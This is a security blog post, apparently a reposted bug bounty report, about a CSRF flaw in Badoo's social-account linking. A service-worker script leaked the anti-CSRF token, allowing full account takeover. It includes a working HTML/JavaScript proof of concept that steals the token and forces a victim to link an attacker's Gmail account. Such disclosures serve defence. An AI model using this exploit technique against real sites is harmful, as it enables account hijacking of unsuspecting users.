Web Security 24x7

Web Security | Web Hacking | Bug Bounty POC | Web Penetration Testing Tools

Tuesday, July 12, 2016

Full account takeover using CSRF

Pren Host Blog Demo 12:00 AM
Hi , I have found a CSRF issue that allows an attacker to link his gmail , facebook ... or any social account to the victim's account and hijack the whole account.

Details:

When a user tries to link a gmail account with his account , after he authorizes badoo to use his gmail account he will be redirected tohttps://eu1.badoo.com/google/verify.phtml?rt=<State_param_value>&code=<Code_returned_from_google> , the only thing that protects from CSRF is the rt parameter which is unique for each user/session . I have noticed that the rt parameter is returned on almost all json responses so I tried to find a link that leaks it. After digging for a while , I have found this link https://eu1.badoo.com/worker-scope/chrome-service-worker.js , and I was surprised that it contains the rt parameter value!! 
if you open the link https://eu1.badoo.com/worker-scope/chrome-service-worker.js you'll find a string variable url_stats containing the value of the rt parameter:
var url_stats = 'https://eu1.badoo.com/chrome-push-stats?ws=1&rt=<rt_param_value>';
So, now I got a javascript file with the rt param value and I can use it to link any malicious social media account with it.

Here is a PoC:

Here is a live PoC: http://azzazpp.com/badoo.html which will link a dummy gmail account of mine to your badoo account. Go tohttps://eu1.badoo.com/settings then check your social accounts and you will see a gmail account with the name Mahmoud Gamal added to your social accounts.
<html> <head> <title>Badoo account take over</title> <script src=https://eu1.badoo.com/worker-scope/chrome-service-worker.js?ws=1></script> </head> <body> <script> function getCSRFcode(str) { return str.split('=')[2]; } window.onload = function(){ var csrf_code = getCSRFcode(url_stats); csrf_url = 'https://eu1.badoo.com/google/verify.phtml?code=4/nprfspM3yfn2SFUBear08KQaXo609JkArgoju1gZ6Pc&authuser=3&session_state=7cb85df679219ce71044666c7be3e037ff54b560..a810&prompt=none&rt='+ csrf_code; window.location = csrf_url; }; </script>
After an attacker links his gmail , facebook or any social account to the victim's account , he can use it to login to the victim's account and do any modifications he wants.
Thanks

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Recent Posts

Recent Posts Widget

Popular Posts

Contact Form

Name

Email *

Message *